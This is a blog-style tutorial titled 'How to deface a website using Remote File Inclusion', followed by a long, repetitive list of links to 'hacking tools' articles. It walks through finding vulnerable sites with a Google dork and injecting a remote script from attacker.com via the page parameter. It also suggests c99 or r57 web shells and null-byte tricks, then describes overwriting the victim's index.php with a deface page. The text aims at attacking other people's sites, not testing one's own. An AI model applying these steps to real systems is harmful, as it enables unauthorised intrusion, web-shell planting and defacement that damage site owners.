HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?
Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.
SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?
First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
- You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
- In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
- Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
More articles
- Hacker Tools Free
- Hack Tools For Pc
- Pentest Tools Framework
- Hack Tool Apk
- Install Pentest Tools Ubuntu
- Hacker Tools 2020
- Hack Tools Github
- Hack Apps
- Nsa Hacker Tools
- Hacker
- Hacking Tools Kit
- Pentest Tools Linux
- New Hack Tools
- Pentest Tools Windows
- Hack Website Online Tool
- Github Hacking Tools
- Blackhat Hacker Tools
- New Hack Tools
- Hack Apps
- Hacking App
- Pentest Tools Download
- Hacker Tools List
- Pentest Tools Website
- Hacking Tools Pc
- Hacker Tools Mac
- Hacker Search Tools
- Pentest Tools Alternative
- Hacker Tools Apk
- What Are Hacking Tools
- Hackers Toolbox
- Beginner Hacker Tools
- Hacker Tools Mac
- Pentest Recon Tools
- Hacking Tools For Windows 7
- Hacker Tools Hardware
- Hacking Tools Windows 10
- Termux Hacking Tools 2019
- Wifi Hacker Tools For Windows
- World No 1 Hacker Software
- Hacking Tools Windows 10
- Hacker Hardware Tools
- Hack Tools Online
- Hacking Tools Usb
- Hackrf Tools
- Hacker Tools Hardware
- Hacking Tools For Windows Free Download
- Hacking Tools For Kali Linux
- Hacker Tools 2019
- Pentest Tools Website Vulnerability
- Hacking Tools 2019
- Hack Website Online Tool
- Hacking Tools Online
- Top Pentest Tools
- Hacker Tools 2020
- Game Hacking
- Bluetooth Hacking Tools Kali
- Hacking Tools For Games
- Pentest Automation Tools
- Pentest Tools Alternative
- Pentest Recon Tools
- What Are Hacking Tools
- Pentest Tools Find Subdomains
- Android Hack Tools Github
- Hacker Tool Kit
- Hacking Tools Usb
- Pentest Tools
- Pentest Tools Free
- Pentest Tools Android
- Hacker Tools For Mac
- Hacker Tools Github
- Nsa Hack Tools
- Hacking Tools For Games
- Pentest Tools For Mac
- Pentest Automation Tools
- Hacking Tools Software
- Computer Hacker
- Nsa Hack Tools
HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?